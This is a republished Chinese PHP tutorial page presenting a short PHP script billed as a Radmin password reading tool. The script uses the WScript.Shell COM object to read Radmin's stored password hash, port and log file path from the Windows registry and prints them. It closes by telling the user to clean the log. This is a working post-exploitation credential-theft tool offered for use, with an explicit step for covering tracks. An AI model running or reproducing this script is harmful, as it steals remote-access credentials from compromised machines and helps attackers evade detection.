首页 > 后端开发 > php教程 > Radmin密码读取工具(php版)_PHP教程

Radmin密码读取工具(php版)_PHP教程

WBOY
发布: 2016-07-13 17:34:34
原创
1257 人浏览过

孤水绕城’s Blog

应小猪大锅的要求写的一个脚本。很垃圾但是还算有用吧。

$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
$rootkey = "HKEY_LOCAL_MACHINE\SYSTEMRAdmin\v2.0\Server\Parameters\";
$Parameter = "Parameter";
$Port = "Port";
$logpath = "LogFilePath";
$myparam = $shell->RegRead($rootkey.$Parameter);
$myport = $shell->RegRead($rootkey.$Port);
$path = $shell->RegRead($rootkey.$logpath);
echo "radmin hash is:";
foreach($myparam as $a){
echo dechex($a);
}
echo "
";
echo "radmin port is :".hexdec(dechex($myport[1]).dechex($myport[0]))."
";
echo "radmin log path is:$path
";
echo "please clean the log"
?>

www.bkjia.comtruehttp://www.bkjia.com/PHPjc/508458.htmlTechArticle孤水绕城’s Blog 应小猪大锅的要求写的一个脚本。很垃圾但是还算有用吧。 ?php $shell = new COM("WScript.Shell") or die("This thing requires Windows Scri...
来源:php.cn
本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板